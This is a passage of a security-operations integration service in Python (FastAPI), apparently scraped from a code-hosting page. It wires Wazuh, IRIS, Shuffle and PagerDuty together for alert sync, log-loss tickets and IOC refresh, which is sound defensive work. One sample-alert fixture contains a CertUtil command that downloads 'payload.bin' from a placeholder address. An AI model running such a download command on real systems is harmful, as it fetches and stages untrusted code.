Bez popisu

main.py 102KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270
37047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069107010711072107310741075107610771078107910801081108210831084108510861087108810891090109110921093109410951096109710981099110011011102110311041105110611071108110911101111111211131114111511161117111811191120112111221123112411251126112711281129113011311132113311341135113611371138113911401141114211431144114511461147114811491150115111521153115411551156115711581159116011611162116311641165116611671168116911701171117211731174117511761177117811791180118111821183118411851186118711881189119011911192119311941195119611971198119912001201120212031204120512061207120812091210121112121213121412151216121712181219122012211222122312241225122612271228122912301231123212331234123512361237123812391240124112421243124412451246124712481249125012511252125312541255125612571258125912601261126212631264126512661267126812691270127112721273127412751276127
71278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177
71778177917801781178217831784178517861787178817891790179117921793179417951796179717981799180018011802180318041805180618071808180918101811181218131814181518161817181818191820182118221823182418251826182718281829183018311832183318341835183618371838183918401841184218431844184518461847184818491850185118521853185418551856185718581859186018611862186318641865186618671868186918701871187218731874187518761877187818791880188118821883188418851886188718881889189018911892189318941895189618971898189919001901190219031904190519061907190819091910191119121913191419151916191719181919192019211922192319241925192619271928192919301931193219331934193519361937193819391940194119421943194419451946194719481949195019511952195319541955195619571958195919601961196219631964196519661967196819691970197119721973197419751976197719781979198019811982198319841985198619871988198919901991199219931994199519961997199819992000200120022003200420052006200720082009201020112012201320142015201620172018201920202021202220232024202520262027202820292030203120322033203420352036203720382039204020412042204320442045204620472048204920502051205220532054205520562057205820592060206120622063206420652066206720682069207020712072207320742075207620772078207920802081208220832084208520862087208820892090209120922093209420952096209720982099210021012102210321042105210621072108210921102111211221132114211521162117211821192120212121222123212421252126212721282129213021312132213321342135213621372138213921402141214221432144214521462147214821492150215121522153215421552156215721582159216021612162216321642165216621672168216921702171217221732174217521762177217821792180218121822183218421852186218721882189219021912192219321942195219621972198219922002201220222032204220522062207220822092210221122122213221422152216221722182219222022212222222322242225222622272228222922302231223222332234223522362237223822392240224122422243224422452246224722482249225022512252225322542255225622572258225922602261226222632264226522662267226822692270227122722273227422752276227
72278227922802281228222832284228522862287228822892290229122922293229422952296229722982299230023012302230323042305230623072308230923102311231223132314231523162317231823192320232123222323232423252326232723282329233023312332233323342335233623372338233923402341234223432344234523462347234823492350235123522353235423552356235723582359236023612362236323642365236623672368236923702371237223732374237523762377237823792380238123822383238423852386238723882389239023912392239323942395239623972398239924002401240224032404240524062407240824092410241124122413241424152416241724182419242024212422242324242425242624272428242924302431243224332434243524362437243824392440244124422443244424452446244724482449245024512452245324542455245624572458245924602461246224632464246524662467246824692470247124722473247424752476247724782479248024812482248324842485248624872488248924902491249224932494249524962497249824992500250125022503250425052506250725082509251025112512251325142515251625172518251925202521252225232524252525262527252825292530253125322533253425352536253725382539254025412542254325442545254625472548254925502551255225532554255525562557255825592560256125622563256425652566256725682569257025712572257325742575257625772578257925802581258225832584258525862587258825892590259125922593259425952596259725982599260026012602260326042605260626072608260926102611261226132614261526162617261826192620262126222623262426252626262726282629263026312632263326342635263626372638263926402641264226432644264526462647264826492650265126522653265426552656265726582659266026612662266326642665266626672668266926702671267226732674267526762677267826792680268126822683268426852686268726882689269026912692269326942695269626972698269927002701270227032704270527062707270827092710271127122713271427152716271727182719272027212722272327242725272627272728272927302731273227332734273527362737273827392740274127422743274427452746274727482749275027512752275327542755275627572758275927602761276227632764276527662767276827692770277127722773277427752776277
7277827792780278127822783278427852786278727882789279027912792279327942795279627972798279928002801280228032804280528062807280828092810281128122813
  1. import asyncio
  2. import logging
  3. import os
  4. import re
  5. import shlex
  6. import subprocess
  7. import uuid
  8. from collections import deque
  9. from datetime import datetime, timedelta, timezone
  10. from pathlib import Path
  11. from psycopg import sql
  12. from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
  13. import csv
  14. import io
  15. from fastapi.responses import FileResponse, Response, StreamingResponse
  16. from fastapi.staticfiles import StaticFiles
  17. from app.adapters.abuseipdb import AbuseIpdbAdapter
  18. from app.adapters.geoip import GeoIpAdapter
  19. from app.adapters.ioc_feed import IocFeedAdapter
  20. from app.adapters.iris import IrisAdapter
  21. from app.adapters.pagerduty import PagerDutyAdapter
  22. from app.adapters.shuffle import ShuffleAdapter
  23. from app.adapters.virustotal import VirusTotalAdapter
  24. from app.adapters.wazuh import WazuhAdapter
  25. from app.config import settings
  26. from app.db import get_conn, init_schema
  27. from app.models import (
  28. ActionCreateIncidentRequest,
  29. ApiResponse,
  30. CDetectionEvaluateRequest,
  31. IocEnrichRequest,
  32. IocEvaluateRequest,
  33. IrisAlertCreateRequest,
  34. IrisTicketCreateRequest,
  35. LogLossCheckRequest,
  36. LogLossStreamCheck,
  37. SimLogRunRequest,
  38. ShuffleLoginRequest,
  39. ShuffleProxyRequest,
  40. SyncPolicyRequest,
  41. TriggerShuffleRequest,
  42. WazuhIngestRequest,
  43. )
  44. from app.repositories.mvp_repo import MvpRepository
  45. from app.routes.mvp import build_mvp_router
  46. from app.security import require_internal_api_key
  47. from app.services.ioc_list_service import IocListService
  48. from app.services.mvp_service import MvpService
  49. from app.services.c_detection_service import CDetectionService
# FastAPI application instance plus shared module-level constants.
app = FastAPI(title=settings.app_name, version="0.1.0")
logger = logging.getLogger(__name__)
# Directory holding the bundled single-page UI and its static assets.
UI_DIR = Path(__file__).resolve().parent / "ui"
UI_ASSETS_DIR = UI_DIR / "assets"
# Locations used by the simulation-run endpoints: bundled scripts and
# a scratch directory for captured run logs.
SIM_SCRIPTS_DIR = Path("/app/scripts")
SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs")
# Upstream integration adapters, each configured from application settings.
wazuh_adapter = WazuhAdapter(
    base_url=settings.wazuh_base_url,
    username=settings.wazuh_username,
    password=settings.wazuh_password,
    indexer_url=settings.wazuh_indexer_url,
    indexer_username=settings.wazuh_indexer_username,
    indexer_password=settings.wazuh_indexer_password,
)
shuffle_adapter = ShuffleAdapter(
    base_url=settings.shuffle_base_url,
    api_key=settings.shuffle_api_key,
)
pagerduty_adapter = PagerDutyAdapter(
    base_url=settings.pagerduty_base_url,
    api_key=settings.pagerduty_api_key,
)
iris_adapter = IrisAdapter(
    base_url=settings.iris_base_url,
    api_key=settings.iris_api_key,
)
virustotal_adapter = VirusTotalAdapter(
    base_url=settings.virustotal_base_url,
    api_key=settings.virustotal_api_key,
)
abuseipdb_adapter = AbuseIpdbAdapter(
    base_url=settings.abuseipdb_base_url,
    api_key=settings.abuseipdb_api_key,
)
geoip_adapter = GeoIpAdapter(
    provider=settings.geoip_provider,
    cache_ttl_seconds=settings.geoip_cache_ttl_seconds,
)
# Shared repository and the service layer wired with the adapters above.
repo = MvpRepository()
mvp_service = MvpService(
    repo=repo,
    wazuh_adapter=wazuh_adapter,
    shuffle_adapter=shuffle_adapter,
    iris_adapter=iris_adapter,
    pagerduty_adapter=pagerduty_adapter,
    virustotal_adapter=virustotal_adapter,
    abuseipdb_adapter=abuseipdb_adapter,
)
c_detection_service = CDetectionService(
    repo=repo,
    geoip_adapter=geoip_adapter,
)
ioc_list_service = IocListService(
    repo=repo,
    wazuh_adapter=wazuh_adapter,
    feed_adapter=IocFeedAdapter(),
    lists_path=settings.wazuh_lists_path,
    confidence_threshold=settings.ioc_refresh_confidence_threshold,
    lookback_days=settings.ioc_refresh_lookback_days,
)
# Mount the MVP API router and the static UI asset directory.
app.include_router(build_mvp_router(mvp_service, require_internal_api_key))
app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets")
  112. @app.middleware("http")
  113. async def ui_no_cache_middleware(request: Request, call_next):
  114. response: Response = await call_next(request)
  115. if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"):
  116. response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
  117. response.headers["Pragma"] = "no-cache"
  118. response.headers["Expires"] = "0"
  119. return response
# Default telemetry streams checked by the log-loss monitor when a request
# does not supply its own list.  Each entry holds the kwargs for a
# LogLossStreamCheck: a Wazuh query plus the minimum alert count expected
# within the checked window.
DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [
    {
        "name": "fortigate",
        "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E",
        "min_count": 1,
    },
    {
        "name": "windows_agent",
        "query": "full_log:windows_agent OR full_log:windows",
        "min_count": 1,
    },
    {
        "name": "vmware",
        "query": "full_log:vmware",
        "min_count": 1,
    },
    {
        "name": "log_monitor",
        "query": "full_log:log_monitor OR rule.id:100411",
        "min_count": 1,
    },
]
async def _execute_log_loss_check(
    req: LogLossCheckRequest,
    create_ticket: bool,
) -> dict[str, object]:
    """Check each telemetry stream for log loss and optionally open an IRIS case.

    For every stream, counts matching Wazuh alerts over the last
    ``req.minutes`` minutes and marks the stream as "loss" when the observed
    count falls below its ``min_count``.  When *create_ticket* is true and at
    least one stream reported loss, an IRIS case is created, subject to a
    cooldown stored in ``app.state.log_loss_monitor_state`` so repeated runs
    do not spam tickets.

    Returns a dict with ``checked_at``, ``minutes``, ``summary``, ``streams``
    and — only when ticket creation was attempted or skipped — ``ticket``.
    """
    minutes = max(1, int(req.minutes))
    # Fall back to the built-in stream definitions when none were supplied.
    streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS]
    items: list[dict[str, object]] = []
    loss_count = 0
    error_count = 0
    loss_stream_names: list[str] = []
    for stream in streams:
        min_count = max(0, int(stream.min_count))
        try:
            observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes)
            is_loss = observed < min_count
            if is_loss:
                loss_count += 1
                loss_stream_names.append(stream.name)
            items.append(
                {
                    "name": stream.name,
                    "query": stream.query,
                    "minutes": minutes,
                    "min_count": min_count,
                    "observed_count": observed,
                    "status": "loss" if is_loss else "ok",
                }
            )
        except Exception as exc:
            # A failed query counts as an "error" stream, not as loss.
            error_count += 1
            items.append(
                {
                    "name": stream.name,
                    "query": stream.query,
                    "minutes": minutes,
                    "min_count": min_count,
                    "observed_count": None,
                    "status": "error",
                    "error": str(exc),
                }
            )
    summary = {
        "total_streams": len(items),
        "loss_streams": loss_count,
        "error_streams": error_count,
        "all_ok": loss_count == 0 and error_count == 0,
    }
    ticket_data: dict[str, object] | None = None
    if create_ticket and loss_count > 0:
        cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds))
        now_ts = datetime.now(timezone.utc).timestamp()
        state = app.state.log_loss_monitor_state
        last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0)
        in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown
        if not in_cooldown:
            title = f"Log loss detected ({loss_count} stream(s))"
            description = (
                f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). "
                f"Affected streams: {', '.join(loss_stream_names)}."
            )
            case_payload = {
                "case_name": title,
                "case_description": description,
                "case_customer": settings.iris_default_customer_id,
                "case_soc_id": settings.iris_default_soc_id,
            }
            try:
                iris_result = await iris_adapter.create_case(case_payload)
                # Advance the cooldown clock only when the case was created.
                state["last_ticket_ts"] = now_ts
                ticket_data = {"created": True, "iris": iris_result}
            except Exception as exc:
                ticket_data = {"created": False, "error": str(exc)}
        else:
            ticket_data = {
                "created": False,
                "skipped": "cooldown_active",
                "cooldown_seconds": cooldown,
                "last_ticket_ts": last_ticket_ts,
            }
    result: dict[str, object] = {
        "checked_at": datetime.now(timezone.utc).isoformat(),
        "minutes": minutes,
        "summary": summary,
        "streams": items,
    }
    if ticket_data is not None:
        result["ticket"] = ticket_data
    return result
  230. async def _log_loss_monitor_loop() -> None:
  231. interval = max(5, int(settings.log_loss_monitor_interval_seconds))
  232. while True:
  233. started_at = datetime.now(timezone.utc).isoformat()
  234. try:
  235. app.state.log_loss_monitor_state["running"] = True
  236. app.state.log_loss_monitor_state["last_started_at"] = started_at
  237. req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes)))
  238. result = await _execute_log_loss_check(
  239. req=req,
  240. create_ticket=bool(settings.log_loss_monitor_create_iris_ticket),
  241. )
  242. app.state.log_loss_monitor_state["last_status"] = "ok"
  243. app.state.log_loss_monitor_state["last_result"] = result
  244. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  245. logger.info(
  246. "log-loss monitor checked=%s loss=%s errors=%s",
  247. result.get("summary", {}).get("total_streams", 0),
  248. result.get("summary", {}).get("loss_streams", 0),
  249. result.get("summary", {}).get("error_streams", 0),
  250. )
  251. except Exception as exc:
  252. app.state.log_loss_monitor_state["last_status"] = "error"
  253. app.state.log_loss_monitor_state["last_error"] = str(exc)
  254. app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  255. logger.exception("log-loss monitor failed: %s", exc)
  256. finally:
  257. app.state.log_loss_monitor_state["running"] = False
  258. await asyncio.sleep(interval)
  259. async def _wazuh_auto_sync_loop() -> None:
  260. interval = max(5, int(settings.wazuh_auto_sync_interval_seconds))
  261. while True:
  262. started_at = datetime.now(timezone.utc).isoformat()
  263. try:
  264. app.state.wazuh_auto_sync_state["running"] = True
  265. app.state.wazuh_auto_sync_state["last_started_at"] = started_at
  266. result = await mvp_service.sync_wazuh_alerts(
  267. query=settings.wazuh_auto_sync_query,
  268. limit=settings.wazuh_auto_sync_limit,
  269. minutes=settings.wazuh_auto_sync_minutes,
  270. )
  271. app.state.wazuh_auto_sync_state["last_status"] = "ok"
  272. app.state.wazuh_auto_sync_state["last_result"] = result
  273. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  274. logger.info(
  275. "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s",
  276. result.get("processed", 0),
  277. result.get("ingested", 0),
  278. result.get("skipped_existing", 0),
  279. result.get("failed", 0),
  280. result.get("ioc_evaluated", 0),
  281. result.get("ioc_matched", 0),
  282. result.get("ioc_rejected", 0),
  283. )
  284. except Exception as exc:
  285. app.state.wazuh_auto_sync_state["last_status"] = "error"
  286. app.state.wazuh_auto_sync_state["last_error"] = str(exc)
  287. app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  288. logger.exception("wazuh auto-sync failed: %s", exc)
  289. finally:
  290. app.state.wazuh_auto_sync_state["running"] = False
  291. await asyncio.sleep(interval)
  292. async def _ioc_refresh_loop() -> None:
  293. interval = max(300, int(settings.ioc_refresh_interval_seconds))
  294. while True:
  295. started_at = datetime.now(timezone.utc).isoformat()
  296. try:
  297. app.state.ioc_refresh_state["running"] = True
  298. app.state.ioc_refresh_state["last_started_at"] = started_at
  299. result = await ioc_list_service.refresh()
  300. app.state.ioc_refresh_state["last_status"] = "ok"
  301. app.state.ioc_refresh_state["last_result"] = result
  302. app.state.ioc_refresh_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  303. lists = result.get("lists", {})
  304. logger.info(
  305. "ioc-refresh complete ips=%s domains=%s hashes=%s wazuh_restarted=%s errors=%s",
  306. lists.get("malicious_ips", 0),
  307. lists.get("malicious_domains", 0),
  308. lists.get("malware_hashes", 0),
  309. result.get("wazuh_restarted"),
  310. len(result.get("errors", [])),
  311. )
  312. except Exception as exc:
  313. app.state.ioc_refresh_state["last_status"] = "error"
  314. app.state.ioc_refresh_state["last_error"] = str(exc)
  315. app.state.ioc_refresh_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  316. logger.exception("ioc-refresh failed: %s", exc)
  317. finally:
  318. app.state.ioc_refresh_state["running"] = False
  319. await asyncio.sleep(interval)
  320. def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]:
  321. event = dict(match.get("event") or {})
  322. usecase_id = str(match.get("usecase_id") or "C-unknown")
  323. section = str(match.get("section") or "c")
  324. severity = str(match.get("severity") or "medium")
  325. entity = str(match.get("entity") or "unknown")
  326. evidence = dict(match.get("evidence") or {})
  327. source = str(event.get("source") or "wazuh")
  328. timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat())
  329. event_id = str(event.get("event_id") or f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}")
  330. payload = dict(event.get("payload") or {})
  331. asset = dict(event.get("asset") or {})
  332. network = dict(event.get("network") or {})
  333. event_type = "c2_credential_abuse"
  334. if section == "c1":
  335. event_type = "c1_impossible_travel"
  336. elif section == "c3":
  337. event_type = "c3_lateral_movement"
  338. title = f"{usecase_id} detection for {entity}"
  339. description = f"{usecase_id} matched for entity={entity}. evidence={evidence}"
  340. tags = list(event.get("tags") or [])
  341. tags.extend(["appendix_c", usecase_id.lower(), section])
  342. return {
  343. "source": source,
  344. "event_type": event_type,
  345. "event_id": event_id,
  346. "timestamp": timestamp,
  347. "severity": severity,
  348. "title": title,
  349. "description": description,
  350. "asset": asset,
  351. "network": network,
  352. "tags": sorted(set(tags)),
  353. "risk_context": {"appendix_c_usecase": usecase_id},
  354. "raw": event.get("raw") or {},
  355. "payload": payload,
  356. }
@app.on_event("startup")
async def startup() -> None:
    """Initialize DB schema, default policy, per-feature state dicts, and the
    enabled background loops."""
    init_schema()
    repo.ensure_policy()
    # Mutable status dicts written by the background loops; each records the
    # last run's status, timestamps, error, and result.
    app.state.wazuh_auto_sync_state = {
        "running": False,
        "last_status": None,
        "last_started_at": None,
        "last_finished_at": None,
        "last_error": None,
        "last_result": None,
    }
    app.state.log_loss_monitor_state = {
        "running": False,
        "last_status": None,
        "last_started_at": None,
        "last_finished_at": None,
        "last_error": None,
        "last_result": None,
        # Unix timestamp of the last IRIS ticket; drives the ticket cooldown.
        "last_ticket_ts": 0.0,
    }
    app.state.c_detection_state = {
        "last_status": None,
        "last_started_at": None,
        "last_finished_at": None,
        "last_error": None,
        "last_result": None,
        "last_ticket_ts_by_key": {},
    }
    app.state.systems_monitor_state = {
        "last_ok_at": {},
    }
    app.state.ioc_refresh_state = {
        "running": False,
        "last_status": None,
        "last_started_at": None,
        "last_finished_at": None,
        "last_error": None,
        "last_result": None,
    }
    # Registry of simulation runs (processes + metadata) and their log dir.
    app.state.sim_runs = {}
    SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True)
    # Launch each background loop only when enabled via settings.
    if settings.ioc_refresh_enabled:
        app.state.ioc_refresh_task = asyncio.create_task(_ioc_refresh_loop())
        logger.info(
            "ioc-refresh enabled interval=%ss confidence=%.2f lookback_days=%s path=%s",
            settings.ioc_refresh_interval_seconds,
            settings.ioc_refresh_confidence_threshold,
            settings.ioc_refresh_lookback_days,
            settings.wazuh_lists_path,
        )
    if settings.wazuh_auto_sync_enabled:
        app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop())
        logger.info(
            "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s",
            settings.wazuh_auto_sync_interval_seconds,
            settings.wazuh_auto_sync_limit,
            settings.wazuh_auto_sync_minutes,
            settings.wazuh_auto_sync_query,
        )
    if settings.log_loss_monitor_enabled:
        app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop())
        logger.info(
            "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss",
            settings.log_loss_monitor_interval_seconds,
            settings.log_loss_monitor_window_minutes,
            settings.log_loss_monitor_create_iris_ticket,
            settings.log_loss_monitor_ticket_cooldown_seconds,
        )
  426. @app.on_event("shutdown")
  427. async def shutdown() -> None:
  428. task = getattr(app.state, "wazuh_auto_sync_task", None)
  429. if task:
  430. task.cancel()
  431. try:
  432. await task
  433. except asyncio.CancelledError:
  434. pass
  435. ll_task = getattr(app.state, "log_loss_monitor_task", None)
  436. if ll_task:
  437. ll_task.cancel()
  438. try:
  439. await ll_task
  440. except asyncio.CancelledError:
  441. pass
  442. ioc_task = getattr(app.state, "ioc_refresh_task", None)
  443. if ioc_task:
  444. ioc_task.cancel()
  445. try:
  446. await ioc_task
  447. except asyncio.CancelledError:
  448. pass
  449. sim_runs = getattr(app.state, "sim_runs", {})
  450. for run in sim_runs.values():
  451. process = run.get("process")
  452. if process and process.poll() is None:
  453. process.terminate()
  454. @app.get(
  455. "/ui",
  456. summary="SOC Integrator UI",
  457. description="Serve the built-in Alpine.js operations console.",
  458. include_in_schema=False,
  459. )
  460. async def ui_index() -> FileResponse:
  461. if not UI_DIR.exists():
  462. raise HTTPException(status_code=404, detail="UI is not available in this build")
  463. return FileResponse(UI_DIR / "index.html")
  464. @app.get(
  465. "/health",
  466. response_model=ApiResponse,
  467. summary="Service health",
  468. description="Return soc-integrator service identity and configured upstream targets.",
  469. )
  470. async def health() -> ApiResponse:
  471. return ApiResponse(
  472. data={
  473. "service": settings.app_name,
  474. "env": settings.app_env,
  475. "targets": {
  476. "wazuh": settings.wazuh_base_url,
  477. "shuffle": settings.shuffle_base_url,
  478. "pagerduty": settings.pagerduty_base_url,
  479. "iris": settings.iris_base_url,
  480. },
  481. }
  482. )
  483. def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
  484. src_payload = dict(payload.payload or {})
  485. src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
  486. src_payload.setdefault("id", payload.alert_id)
  487. src_payload.setdefault(
  488. "rule",
  489. {
  490. "id": payload.rule_id or "unknown",
  491. "level": payload.severity if payload.severity is not None else 5,
  492. "description": payload.title or "Wazuh alert",
  493. },
  494. )
  495. return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
  496. def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
  497. normalized = {
  498. "source": payload.source,
  499. "alert_id": payload.alert_id,
  500. "rule_id": payload.rule_id,
  501. "severity": payload.severity,
  502. "title": payload.title,
  503. "payload": payload.payload,
  504. }
  505. hit = _build_wazuh_hit_from_ingest(payload)
  506. normalized_event = mvp_service.normalize_wazuh_hit(hit)
  507. return {
  508. "normalized": normalized,
  509. "normalized_event": normalized_event,
  510. }
  511. @app.post(
  512. "/ingest/wazuh-alert",
  513. response_model=ApiResponse,
  514. summary="Normalize Wazuh alert",
  515. description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
  516. )
  517. async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
  518. return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
@app.get(
    "/ingest/wazuh-alert/samples",
    response_model=ApiResponse,
    summary="Sample normalization cases",
    description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
)
async def ingest_wazuh_alert_samples() -> ApiResponse:
    """Return canned Wazuh ingest requests with their normalized output.

    One sample per use-case family shown in the titles (A1 DNS IOC match,
    B1 ESXi SSH enable, B3 CertUtil download, C1 impossible travel), each
    run through the same normalization pipeline as the live ingest endpoint.
    Timestamps are generated at request time, so outputs are not byte-stable
    across calls.
    """
    sample_payloads = [
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110302",
            alert_id="sample-a1-02",
            severity=8,
            title="A1 production: DNS IOC domain match event",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
                "agent": {"name": "dns-fw-01", "id": "001"},
            },
        ),
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110402",
            alert_id="sample-b1-02",
            severity=8,
            title="B1 production: ESXi SSH enabled",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
                "agent": {"name": "esxi-01", "id": "002"},
            },
        ),
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110426",
            alert_id="sample-b3-06",
            severity=8,
            title="B3 production: CertUtil download pattern",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
                "agent": {"name": "win-sysmon-01", "id": "003"},
            },
        ),
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110501",
            alert_id="sample-c1-01",
            severity=12,
            title="C1 production: Impossible travel",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
                "agent": {"name": "fgt-vpn-01", "id": "004"},
            },
        ),
    ]
    cases = []
    for item in sample_payloads:
        cases.append(
            {
                "name": str(item.alert_id),
                "request": item.model_dump(mode="json"),
                # Run the sample through the same normalization as live ingest.
                "result": _normalize_wazuh_ingest_payload(item),
            }
        )
    return ApiResponse(data={"cases": cases, "count": len(cases)})
  586. @app.post(
  587. "/action/create-incident",
  588. response_model=ApiResponse,
  589. summary="Create PagerDuty incident",
  590. description="Create an incident in PagerDuty (stub or real integration) from request payload.",
  591. )
  592. async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse:
  593. incident_payload = {
  594. "title": payload.title,
  595. "urgency": payload.severity,
  596. "incident_key": payload.dedupe_key,
  597. "body": payload.payload,
  598. "source": payload.source,
  599. }
  600. try:
  601. pd_result = await pagerduty_adapter.create_incident(incident_payload)
  602. except Exception as exc:
  603. raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc
  604. return ApiResponse(data={"pagerduty": pd_result})
  605. @app.post(
  606. "/action/trigger-shuffle",
  607. response_model=ApiResponse,
  608. summary="Trigger Shuffle workflow",
  609. description="Execute a Shuffle workflow by ID with execution_argument payload.",
  610. )
  611. async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse:
  612. try:
  613. shuffle_result = await shuffle_adapter.trigger_workflow(
  614. workflow_id=payload.workflow_id,
  615. payload=payload.execution_argument,
  616. )
  617. except Exception as exc:
  618. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  619. return ApiResponse(data={"shuffle": shuffle_result})
  620. @app.get(
  621. "/shuffle/health",
